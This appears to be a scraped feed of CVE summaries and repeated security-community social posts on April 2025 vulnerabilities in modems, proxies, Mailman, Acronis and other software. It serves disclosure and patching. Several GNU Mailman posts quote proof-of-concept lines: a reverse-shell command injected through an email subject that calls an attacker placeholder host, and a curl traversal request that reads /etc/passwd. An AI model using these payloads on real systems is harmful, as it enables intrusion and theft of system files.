An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.

nvd.nist.gov/vuln/detail/CVE-2

##

cR0w@infosec.exchange at 2025-04-25T13:47:43.000Z ##

Who doesn't like RCE in Viastat modems? Well here's two of them. Happy Friday.

onekey.com/resource/security-a

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/R:U/V:C/RE:M/U:Red

The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.

nvd.nist.gov/vuln/detail/CVE-2

onekey.com/resource/security-a

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:N/R:U/V:D/RE:M/U:Red

An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2024-6198(CVSS UNKNOWN)

EPSS: 0.00%

updated 2025-04-25T15:31:29

4 posts

The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.

cR0w at 2025-04-25T13:47:43.282Z ##

Who doesn't like RCE in Viastat modems? Well here's two of them. Happy Friday.

onekey.com/resource/security-a

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/R:U/V:C/RE:M/U:Red

The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.

nvd.nist.gov/vuln/detail/CVE-2

onekey.com/resource/security-a

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:N/R:U/V:D/RE:M/U:Red

An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.

nvd.nist.gov/vuln/detail/CVE-2

##

_r_netsec at 2025-04-25T13:28:06.431Z ##

Remote Code Execution on Viasat Modems (CVE-2024-6198) onekey.com/resource/security-a

##

cR0w@infosec.exchange at 2025-04-25T13:47:43.000Z ##

Who doesn't like RCE in Viastat modems? Well here's two of them. Happy Friday.

onekey.com/resource/security-a

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/R:U/V:C/RE:M/U:Red

The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.

nvd.nist.gov/vuln/detail/CVE-2

onekey.com/resource/security-a

sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:N/R:U/V:D/RE:M/U:Red

An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.

nvd.nist.gov/vuln/detail/CVE-2

##

_r_netsec@infosec.exchange at 2025-04-25T13:28:06.000Z ##

Remote Code Execution on Viasat Modems (CVE-2024-6198) onekey.com/resource/security-a

##

CVE-2025-43946
(9.8 CRITICAL)

EPSS: 0.29%

updated 2025-04-25T15:31:21

1 posts

TCPWave DDI 11.34P1C2 allows Remote Code Execution via Unrestricted File Upload (combined with Path Traversal).

cR0w@infosec.exchange at 2025-04-22T18:57:47.000Z ##

Go hack more AI shit.

TCPWave DDI 11.34P1C2 allows Remote Code Execution via Unrestricted File Upload (combined with Path Traversal).

github.com/Henkel-CyberVM/CVEs

In case you don't know what TCPWave DDI is, this is the big banner on their homepage:

Easy To Use DDI Powered with
Alice Chatbot
Core DDI with Advanced Threat Intelligence to mitigate risks

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-32431(CVSS UNKNOWN)

EPSS: 0.07%

updated 2025-04-25T14:41:50

1 posts

## Impact There is a potential vulnerability in Traefik managing the requests using a `PathPrefix`, `Path` or `PathRegex` matcher. When Traefik is configured to route the requests to a backend using a matcher based on the path, if the URL contains a `/../` in its path, it’s possible to target a backend, exposed using another router, by-passing the middlewares chain. ## Example ```yaml apiVersi

cR0w@infosec.exchange at 2025-04-21T16:42:17.000Z ##

A ../ in a popular reverse proxy and load balancer? Happy Monday! But at least we now know for sure how to pronounce it when we report it to the various teams.

github.com/traefik/traefik/sec

sev:HIGH 8.8 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

Traefik (pronounced traffic) is an HTTP reverse proxy and load balancer. In versions prior to 2.11.24, 3.3.6, and 3.4.0-rc2. There is a potential vulnerability in Traefik managing the requests using a PathPrefix, Path or PathRegex matcher. When Traefik is configured to route the requests to a backend using a matcher based on the path, if the URL contains a /../ in its path, it’s possible to target a backend, exposed using another router, by-passing the middlewares chain. This issue has been patched in versions 2.11.24, 3.3.6, and 3.4.0-rc2. A workaround involves adding a PathRegexp rule to the matcher to prevent matching a route with a /../ in the path.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-46616
(10.0 CRITICAL)

EPSS: 0.18%

updated 2025-04-25T09:31:56

1 posts

Quantum StorNext Web GUI API before 7.2.4 allows potential Arbitrary Remote Code Execution (RCE) via upload of a file. This affects StorNext RYO before 7.2.4, StorNext Xcellis Workflow Director before 7.2.4, and ActiveScale Cold Storage.

cR0w@infosec.exchange at 2025-04-25T13:23:41.000Z ##

I thought quantum was supposed to save security or something?

quantum.com/en/service-support

sev:CRIT 9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Quantum StorNext Web GUI API before 7.2.4 allows potential Arbitrary Remote Code Execution (RCE) via upload of a file. This affects StorNext RYO before 7.2.4, StorNext Xcellis Workflow Director before 7.2.4, and ActiveScale Cold Storage.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43859
(9.1 CRITICAL)

EPSS: 0.03%

updated 2025-04-24T21:41:39

1 posts

### Impact A leniency in h11's parsing of line terminators in chunked-coding message bodies can lead to request smuggling vulnerabilities under certain conditions. ### Details HTTP/1.1 Chunked-Encoding bodies are formatted as a sequence of "chunks", each of which consists of: - chunk length - `\r\n` - `length` bytes of content - `\r\n` In versions of h11 up to 0.14.0, h11 instead parsed them

cR0w@infosec.exchange at 2025-04-24T19:09:02.000Z ##

HTTP Smuggling in Python h11.

github.com/python-hyper/h11/se

sev:CRIT 9.1 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

h11 is a Python implementation of HTTP/1.1. Prior to version 0.16.0, a leniency in h11's parsing of line terminators in chunked-coding message bodies can lead to request smuggling vulnerabilities under certain conditions. This issue has been patched in version 0.16.0. Since exploitation requires the combination of buggy h11 with a buggy (reverse) proxy, fixing either component is sufficient to mitigate this issue.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2024-32752
(9.1 CRITICAL)

EPSS: 0.21%

updated 2025-04-24T21:32:50

1 posts

Under certain circumstances communications between the ICU tool and an iSTAR Pro door controller is susceptible to Machine-in-the-Middle attacks which could impact door control and configuration.

cR0w@infosec.exchange at 2025-04-24T20:08:25.000Z ##

Ooh, a BoF in Johnson Controls iStar Configuration Utility tool.

johnsoncontrols.com/-/media/pr

sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Under certain circumstances the iSTAR Configuration Utility (ICU) tool could have a buffer overflow issue

nvd.nist.gov/vuln/detail/CVE-2

This other advisory from last June was also updated today.

johnsoncontrols.com/-/media/pr

sev:HIGH 8.8 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N

Johnson Controls has confirmed a vulnerability impacting the Software House iSTAR Configuration Utility (ICU) tool for Software House iSTAR Pro, Edge, eX, Ultra and Ultra LT door controllers which may result in insecure communications.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-26382(CVSS UNKNOWN)

EPSS: 0.04%

updated 2025-04-24T21:31:54

2 posts

Under certain circumstances the iSTAR Configuration Utility (ICU) tool could have a buffer overflow issue

beyondmachines1@infosec.exchange at 2025-04-25T13:01:35.000Z ##

Johnson Controls reports critical vulnerability in ICU tool

A critical stack-based buffer overflow vulnerability (CVE-2025-26382, CVSS 9.8) in Johnson Controls' ICU tool affects versions prior to 6.9.5, allowing unauthenticated remote attackers to execute arbitrary code and potentially gain complete system control.

**If you are using Johnson Controls' ICU tool, the usual rules apply - Make sure it's isolated from the internet and accessible only from trusted networks. Then plan a patch, because every isolation can be breached given enough time.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

cR0w@infosec.exchange at 2025-04-24T20:08:25.000Z ##

Ooh, a BoF in Johnson Controls iStar Configuration Utility tool.

johnsoncontrols.com/-/media/pr

sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Under certain circumstances the iSTAR Configuration Utility (ICU) tool could have a buffer overflow issue

nvd.nist.gov/vuln/detail/CVE-2

This other advisory from last June was also updated today.

johnsoncontrols.com/-/media/pr

sev:HIGH 8.8 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N

Johnson Controls has confirmed a vulnerability impacting the Software House iSTAR Configuration Utility (ICU) tool for Software House iSTAR Pro, Edge, eX, Ultra and Ultra LT door controllers which may result in insecure communications.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43858
(9.2 CRITICAL)

EPSS: 0.02%

updated 2025-04-24T19:20:07

1 posts

## Summary This vulnerability only apply when running on a Windows OS. An unsafe conversion of arguments allows the injection of a malicous commands when starting `yt-dlp` from a commands prompt. > [!CAUTION] > **NOTE THAT DEPENDING ON THE CONTEXT AND WHERE THE LIBRARY IS USED, THIS MAY HAVE MORE SEVERE CONSEQUENCES. FOR EXAMPLE, A USER USING THE LIBRARY LOCALLY IS A LOT LESS VULNERABLE THAN AN A

cR0w@infosec.exchange at 2025-04-24T19:07:19.000Z ##

I've heard of people around here using youtube-dl. If you use the Youtube-DLSharp wrapper for it, heads-up.

github.com/Bluegrams/YoutubeDL

sev:CRIT 9.2 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L

YoutubeDLSharp is a wrapper for the command-line video downloaders youtube-dl and yt-dlp. In versions starting from 1.0.0-beta4 and prior to 1.1.2, an unsafe conversion of arguments allows the injection of a malicious commands when starting yt-dlp from a commands prompt running on Windows OS with the UseWindowsEncodingWorkaround value defined to true (default behavior). If a user is using built-in methods from the YoutubeDL.cs file, the value is true by default and a user cannot disable it from these methods. This issue has been patched in version 1.1.2.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43928
(5.8 MEDIUM)

EPSS: 0.04%

updated 2025-04-24T18:32:12

2 posts

In Infodraw Media Relay Service (MRS) 7.1.0.0, the MRS web server (on port 12654) allows reading arbitrary files via ../ directory traversal in the username field. Reading ServerParameters.xml may reveal administrator credentials in cleartext or with MD5 hashing.

0x40k@infosec.exchange at 2025-04-25T10:18:45.000Z ##

Heard of Rack, Ruby, or Infodraw lately? Well, some nasty Path Traversal and Log Manipulation bugs are doing the rounds again, and they're definitely something to watch out for.

First up, Rack's got a vulnerability in `Rack::Static` (that's CVE-2025-27610). Basically, it could let unwanted guests wander through directories where they have no business being. You *really* need to get that updated ASAP. Alternatively, if it works for your setup, just ditch `Rack::Static` altogether.

Then there's Infodraw MRS (CVE-2025-43928), and this one's a kicker: still *no* official patch available! 😬 Since this impacts video surveillance systems, your best bets for now involve taking affected systems offline if possible. If not, sticking them safely behind a VPN or locking things down tight with an IP whitelist should be top priorities.

It's worth remembering, automated scans often breeze right past issues like these. That's where manual testing truly shines – it's absolutely worth its weight in gold here! ☝️

So, what about you? Ever run into headaches with similar vulnerabilities? How are you keeping your own systems buttoned up against these kinds of threats? Let's talk!

#Cybersecurity #Pentest #PathTraversal #RCE

##

cR0w@infosec.exchange at 2025-04-20T16:02:30.000Z ##

../ in LEA shit? Huh.

h/t @varbin

mint-secure.de/path-traversal-

cfp.eh22.easterhegg.eu/eh22/ta

sev:MED 5.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

But the reporter disagrees, which seems to be a theme lately. They claim it should be: sev:HIGH 7.2 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

In Infodraw Media Relay Service (MRS) 7.1.0.0, the MRS web server (on port 12654) allows reading arbitrary files via ../ directory traversal in the username field. Reading ServerParameters.xml may reveal administrator credentials in cleartext or with MD5 hashing.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-28020
(7.3 HIGH)

EPSS: 0.04%

updated 2025-04-24T18:32:10

1 posts

TOTOLINK A800R V4.1.2cu.5137_B20200730 was found to contain a buffer overflow vulnerability in downloadFile.cgi through the v25 parameter.

CVE-2025-28021
(7.3 HIGH)

EPSS: 0.04%

updated 2025-04-24T18:32:10

1 posts

TOTOLINK A810R V4.1.2cu.5182_B20201026 was found to contain a buffer overflow vulnerability in the downloadFile.cgi through the v14 and v3 parameters

CVE-2025-28028
(7.3 HIGH)

EPSS: 0.04%

updated 2025-04-24T18:32:10

1 posts

TOTOLINK A830R V4.1.2cu.5182_B20201102, A950RG V4.1.2cu.5161_B20200903, A3000RU V5.9c.5185_B20201128, and A3100R V4.1.2cu.5247_B20211129 were found to contain a buffer overflow vulnerability in downloadFile.cgi through the v5 parameter.

CVE-2025-28022
(7.3 HIGH)

EPSS: 0.04%

updated 2025-04-24T18:32:10

1 posts

TOTOLINK A810R V4.1.2cu.5182_B20201026 was found to contain a buffer overflow vulnerability in downloadFile.cgi through the v25 parameter.

CVE-2025-27820
(7.5 HIGH)

EPSS: 0.01%

updated 2025-04-24T16:36:11

1 posts

A bug in PSL validation logic in Apache HttpClient 5.4.x disables domain checks, affecting cookie management and host name verification. Discovered by the Apache HttpClient team. Fixed in the 5.4.3 release.

cR0w@infosec.exchange at 2025-04-24T13:09:16.000Z ##

Another Apache vuln, this time in HttpClient.

lists.apache.org/thread/55xhs4

A bug in PSL validation logic in Apache HttpClient 5.4.x disables domain checks, affecting cookie management and host name verification. Discovered by the Apache HttpClient team. Fixed in the 5.4.3 release

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43919
(5.8 MEDIUM)

EPSS: 0.16%

updated 2025-04-24T16:22:37.117000

3 posts

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to read arbitrary files via ../ directory traversal at /mailman/private/mailman (aka the private archive authentication endpoint) via the username parameter.

2 repos

https://github.com/cybersecplayground/CVE-2025-43919-POC

https://github.com/0NYX-MY7H/CVE-2025-43919

cR0w@infosec.exchange at 2025-04-21T13:28:40.000Z ##

ICYMI this weekend:

Command intention via email subject in GNU Mailman as shipped in cPanel. Note the difference of CVSS metrics between the original disclosure and the CNA ( MITRE ).

github.com/0NYX-MY7H/CVE-2025-

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

PoC: Subject: ;bash -i >& /dev/tcp/ATTACKERIP/4444 0>&1

nvd.nist.gov/vuln/detail/CVE-2

There was also a nice ../ to go with it:

github.com/0NYX-MY7H/CVE-2025-

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled with cPanel and WHM, contains a critical directory traversal vulnerability in the /mailman/private/mailman endpoint. Unauthenticated attackers can exploit this flaw to read arbitrary files on the server, such as /etc/passwd or Mailman configuration files, due to insufficient input validation in the private.py CGI script. This vulnerability poses significant risks for information disclosure and can facilitate further attacks when combined with other exploits.

PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman

nvd.nist.gov/vuln/detail/CVE-2

There's also an "Unauthorized Mailing List Creation in GNU Mailman 2.1.39":

github.com/0NYX-MY7H/CVE-2025-

If I ran cPanel with Mailman, looking at the advisories themselves, I would treat it with the original CVSS scores in mind rather than the ones provided by MITRE here.

##

cR0w@infosec.exchange at 2025-04-20T13:23:44.000Z ##

Well if that command injection wasn't enough for you, how about a nice sev:CRIT ../ to go with it? Happy Easter.

github.com/0NYX-MY7H/CVE-2025-

There's also apparently a "Unauthorized Mailing List Creation in GNU Mailman 2.1.39" but the README on that one appears to be the one for the ../ so I don't have any details.

github.com/0NYX-MY7H/CVE-2025-

Edit to add the PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman

#directoryTraversalMemes

##

cR0w@infosec.exchange at 2025-04-20T01:37:05.000Z ##

Command intention via email subject in GNU Mailman. lol. lmao. It's interesting to see the difference of CVSS metrics between the disclosure and the CNA ( MITRE ).

github.com/0NYX-MY7H/CVE-2025-

Per discloser: sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

nvd.nist.gov/vuln/detail/CVE-2

There are a couple more in Mailman while we're here:

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43920
(5.4 MEDIUM)

EPSS: 0.12%

updated 2025-04-24T16:20:36.953000

2 posts

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), in certain external archiver configurations, allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

1 repos

https://github.com/0NYX-MY7H/CVE-2025-43920

cR0w@infosec.exchange at 2025-04-21T13:28:40.000Z ##

ICYMI this weekend:

Command intention via email subject in GNU Mailman as shipped in cPanel. Note the difference of CVSS metrics between the original disclosure and the CNA ( MITRE ).

github.com/0NYX-MY7H/CVE-2025-

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

PoC: Subject: ;bash -i >& /dev/tcp/ATTACKERIP/4444 0>&1

nvd.nist.gov/vuln/detail/CVE-2

There was also a nice ../ to go with it:

github.com/0NYX-MY7H/CVE-2025-

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled with cPanel and WHM, contains a critical directory traversal vulnerability in the /mailman/private/mailman endpoint. Unauthenticated attackers can exploit this flaw to read arbitrary files on the server, such as /etc/passwd or Mailman configuration files, due to insufficient input validation in the private.py CGI script. This vulnerability poses significant risks for information disclosure and can facilitate further attacks when combined with other exploits.

PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman

nvd.nist.gov/vuln/detail/CVE-2

There's also an "Unauthorized Mailing List Creation in GNU Mailman 2.1.39":

github.com/0NYX-MY7H/CVE-2025-

If I ran cPanel with Mailman, looking at the advisories themselves, I would treat it with the original CVSS scores in mind rather than the ones provided by MITRE here.

##

cR0w@infosec.exchange at 2025-04-20T01:37:05.000Z ##

Command intention via email subject in GNU Mailman. lol. lmao. It's interesting to see the difference of CVSS metrics between the disclosure and the CNA ( MITRE ).

github.com/0NYX-MY7H/CVE-2025-

Per discloser: sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

nvd.nist.gov/vuln/detail/CVE-2

There are a couple more in Mailman while we're here:

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43921
(5.3 MEDIUM)

EPSS: 0.03%

updated 2025-04-24T16:16:59.597000

3 posts

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to create lists via the /mailman/create endpoint.

1 repos

https://github.com/0NYX-MY7H/CVE-2025-43921

cR0w@infosec.exchange at 2025-04-21T13:28:40.000Z ##

ICYMI this weekend:

Command intention via email subject in GNU Mailman as shipped in cPanel. Note the difference of CVSS metrics between the original disclosure and the CNA ( MITRE ).

github.com/0NYX-MY7H/CVE-2025-

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

PoC: Subject: ;bash -i >& /dev/tcp/ATTACKERIP/4444 0>&1

nvd.nist.gov/vuln/detail/CVE-2

There was also a nice ../ to go with it:

github.com/0NYX-MY7H/CVE-2025-

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled with cPanel and WHM, contains a critical directory traversal vulnerability in the /mailman/private/mailman endpoint. Unauthenticated attackers can exploit this flaw to read arbitrary files on the server, such as /etc/passwd or Mailman configuration files, due to insufficient input validation in the private.py CGI script. This vulnerability poses significant risks for information disclosure and can facilitate further attacks when combined with other exploits.

PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman

nvd.nist.gov/vuln/detail/CVE-2

There's also an "Unauthorized Mailing List Creation in GNU Mailman 2.1.39":

github.com/0NYX-MY7H/CVE-2025-

If I ran cPanel with Mailman, looking at the advisories themselves, I would treat it with the original CVSS scores in mind rather than the ones provided by MITRE here.

##

cR0w@infosec.exchange at 2025-04-20T13:23:44.000Z ##

Well if that command injection wasn't enough for you, how about a nice sev:CRIT ../ to go with it? Happy Easter.

github.com/0NYX-MY7H/CVE-2025-

There's also apparently a "Unauthorized Mailing List Creation in GNU Mailman 2.1.39" but the README on that one appears to be the one for the ../ so I don't have any details.

github.com/0NYX-MY7H/CVE-2025-

Edit to add the PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman

#directoryTraversalMemes

##

cR0w@infosec.exchange at 2025-04-20T01:37:05.000Z ##

Command intention via email subject in GNU Mailman. lol. lmao. It's interesting to see the difference of CVSS metrics between the disclosure and the CNA ( MITRE ).

github.com/0NYX-MY7H/CVE-2025-

Per discloser: sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

nvd.nist.gov/vuln/detail/CVE-2

There are a couple more in Mailman while we're here:

nvd.nist.gov/vuln/detail/CVE-2

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-43855(CVSS UNKNOWN)

EPSS: 0.07%

updated 2025-04-24T16:03:58

1 posts

### Summary An unhandled error is thrown when validating invalid connectionParams which crashes a tRPC WebSocket server. This allows any unauthenticated user to crash a tRPC 11 WebSocket server. ### Details Any tRPC 11 server with WebSocket enabled with a `createContext` method set is vulnerable. Here is an example: https://github.com/user-attachments/assets/ce1b2d32-6103-4e54-8446-51535b293b05

cR0w@infosec.exchange at 2025-04-24T14:59:58.000Z ##

DoS in tRPC.

github.com/trpc/trpc/security/

sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

tRPC allows users to build & consume fully typesafe APIs without schemas or code generation. In versions starting from 11.0.0 to before 11.1.1, an unhandled error is thrown when validating invalid connectionParams which crashes a tRPC WebSocket server. This allows any unauthenticated user to crash a tRPC 11 WebSocket server. Any tRPC 11 server with WebSocket enabled with a createContext method set is vulnerable. This issue has been patched in version 11.1.1.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-30408
(6.7 MEDIUM)

EPSS: 0.01%

updated 2025-04-24T15:31:46

1 posts

Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.

cR0w@infosec.exchange at 2025-04-24T14:09:03.000Z ##

LPE and DoS in Acronis Cyber Protect Cloud Agent (Windows).

security-advisory.acronis.com/

sev:MED 6.7 - CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.

nvd.nist.gov/vuln/detail/CVE-2

security-advisory.acronis.com/

sev:MED 5.5 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Denial of service due to allocation of resources without limits. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-46421
(6.8 MEDIUM)

EPSS: 0.03%

updated 2025-04-24T15:31:44

1 posts

A flaw was found in libsoup. When libsoup clients encounter an HTTP redirect, they mistakenly send the HTTP Authorization header to the new host that the redirection points to. This allows the new host to impersonate the user to the original host that issued the redirect.

cR0w@infosec.exchange at 2025-04-24T14:10:02.000Z ##

I'm tired of soup, but this one is kind of fun.

A flaw was found in libsoup. When libsoup clients encounter an HTTP redirect, they mistakenly send the HTTP Authorization header to the new host that the redirection points to. This allows the new host to impersonate the user to the original host that issued the redirect.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-30409
(5.5 MEDIUM)

EPSS: 0.01%

updated 2025-04-24T15:31:44

1 posts

Denial of service due to allocation of resources without limits. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.

cR0w@infosec.exchange at 2025-04-24T14:09:03.000Z ##

LPE and DoS in Acronis Cyber Protect Cloud Agent (Windows).

security-advisory.acronis.com/

sev:MED 6.7 - CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.

nvd.nist.gov/vuln/detail/CVE-2

security-advisory.acronis.com/

sev:MED 5.5 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Denial of service due to allocation of resources without limits. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.

nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2025-3872
(7.2 HIGH)

EPSS: 0.02%

updated 2025-04-24T12:31:35

1 posts

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon centreon-web (User configuration form modules) allows SQL Injection. A user with high privileges is able to become administrator by intercepting the contact form request and altering its payload. This issue affects Centreon: from 22.10.0 before 22.10.28, from 23.04.0 before 23.04.25,

cR0w@infosec.exchange at 2025-04-24T13:11:24.000Z ##

